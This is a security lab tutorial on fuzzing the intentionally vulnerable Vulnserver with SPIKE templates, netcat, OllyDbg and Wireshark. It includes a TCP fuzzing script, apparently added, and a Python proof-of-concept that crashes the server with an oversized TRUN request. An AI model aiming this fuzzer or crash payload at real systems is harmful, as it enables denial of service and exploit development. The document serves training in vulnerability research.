Vulnserver is a program which intentionally contains vulnerabilities. After starting, it listens on port 9999, although another port can be used if the port number is passed as the first argument. For example, the following command starts Vulnserver on port 6666:
Vulnserver can be downloaded from here.
Spike is a program which sends crafted packets to an application in order to make it crash. The packets are described by templates. Spike can send both TCP and UDP packets, and with its help vulnerabilities can be found in applications. Spike is part of the Kali distribution.
In this post I will demonstrate the use of Spike against Vulnserver. Vulnserver runs on Windows XP, and I use OllyDbg v1.10 as the debugger.
1. Identify the protocol of Vulnserver
Start Vulnserver on Windows XP. On Kali, connect to Vulnserver with netcat.
nc -nv <WinXP IP address> 9999
Type HELP. This will list the available commands.
You can also try commands that are not listed, commands without parameters, or lowercase commands.
You can also use Wireshark to explore the communication between client and server and determine the packet format in use.
The purpose of this step is to identify the protocol in use.
2. Create Spike templates
Spike templates describe the packet formats of the communication. We can tell Spike which parts of the packet should be varied. For example, the following template will try to send various commands to Vulnserver.
This template, however, will send the STAT command with various parameters.
s_readline();
s_string("STAT ");
s_string_variable("0");
Vulnserver has several commands, so we can create a similar template for each of them.
3. Send packages to Vulnserver with Spike
Spike can send TCP and UDP packets. For TCP packets, we use the generic_send_tcp command. Its form is:
generic_send_tcp <IP address> <port number> <template name> <SKIPVAR> <SKIPSTR>
If the template contains more than one variable, we can test each one by specifying a different value for SKIPVAR. In our case this is always zero.
Spike sends packets with different strings in place of the variable. We can start the test from a certain point by specifying a value for SKIPSTR. If this value is zero, SPIKE starts from the beginning.
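The expansion that generic_send_tcp performs on a template, and what SKIPVAR and SKIPSTR select, can be illustrated with a small Python stand-in (an added example, not code from this post or from SPIKE itself). The fuzz-string list is a constructed placeholder for SPIKE's much longer built-in list, and the crash check relies on the observation in this post that a crashed Vulnserver no longer sends its welcome message; host and port are wherever Vulnserver is listening.

```python
import re
import socket

# Constructed stand-in for SPIKE's built-in fuzz-string list (the real list is
# far longer); a length ladder plus two malformed strings is enough to show the
# mechanics of template expansion.
FUZZ_STRINGS = ["A" * n for n in (1, 100, 1000, 2000, 5000)] + ["%s%s%s%s", "\x00" * 64]

# Matches the three SPIKE primitives used in the post: s_readline(), s_string("..."),
# s_string_variable("...") (the argument is optional so that s_readline() parses too).
TOKEN = re.compile(r's_(string_variable|string|readline)\s*\(\s*(?:"([^"]*)")?\s*\)\s*;')

def parse_template(text):
    """Return the template's primitives in order as (kind, argument) pairs."""
    return [(m.group(1), m.group(2)) for m in TOKEN.finditer(text)]

def expand_template(text, skipvar=0, skipstr=0):
    """One request per fuzz case, following generic_send_tcp's semantics: only the
    variable selected by SKIPVAR is replaced, the others keep their default value,
    and iteration over the fuzz strings starts at index SKIPSTR."""
    items = parse_template(text)
    variables = [i for i, (kind, _) in enumerate(items) if kind == "string_variable"]
    if skipvar >= len(variables):
        raise ValueError("SKIPVAR %d exceeds the template's %d variable(s)" % (skipvar, len(variables)))
    target = variables[skipvar]
    requests = []
    for fuzz in FUZZ_STRINGS[skipstr:]:
        parts = [fuzz if i == target else arg
                 for i, (kind, arg) in enumerate(items)
                 if kind != "readline"]        # s_readline consumes a server line, sends nothing
        requests.append("".join(parts))
    return requests

def fuzz_tcp(host, port, text, skipvar=0, skipstr=0, timeout=3.0):
    """Send each request on its own connection, as generic_send_tcp does, and stop at
    the first connection that yields no welcome banner (assumed crash indicator).
    Returns (case index, request) of the last delivered request, or None."""
    last_sent = None
    for index, request in enumerate(expand_template(text, skipvar, skipstr), start=skipstr):
        try:
            with socket.create_connection((host, port), timeout=timeout) as sock:
                if not sock.recv(1024):          # accepted, but no banner: server is gone
                    return last_sent
                sock.sendall(request.encode("latin-1"))
        except OSError:                          # refused or timed out
            return last_sent
        last_sent = (index, request)
    return None
```

The value returned by fuzz_tcp is the request to look for in the Wireshark capture, since it is the last one the service answered before it stopped responding.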
Before we start sending packets, we have to set up the environment.
- On Windows XP, start Vulnserver.
- Start OllyDbg and attach to Vulnserver, then press the triangle (Run) button so that the process is not left paused in the debugger.
- On Kali, start Wireshark and start capturing.
Now we are ready to send packets with Spike. Try this template first.
generic_send_tcp 192.168.2.132 9999 command.spk 0 0
Watch OllyDbg and wait until the application crashes.
Unfortunately the application does not crash. Restart capturing in Wireshark and try the next template.
generic_send_tcp 192.168.2.132 9999 help.spk 0 0
Still nothing. Test each template.
When there is a crash, we can find the last packet in Wireshark. We can then create a Python script which sends the same packet to the application and use that script as the proof of concept.
For example, trun.spk causes the application to crash.
The crash happened at the second packet; there is no welcome message after it. Let us find the packet in Wireshark.
We now have the format and size of the packet that causes the buffer overflow. The PoC Python script:
#!/usr/bin/python
import socket

host = "192.168.2.132"
port = 9999

# The TRUN request recovered from the Wireshark capture: the command, its
# prefix and a 5050-byte filler, sent as bytes so the script runs on Python 2 and 3
buffer = b"TRUN /.:/" + b"A" * 5050

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
The following templates will cause the application to crash:
In the next posts I will show how to create an exploit from the proof-of-concept Python script.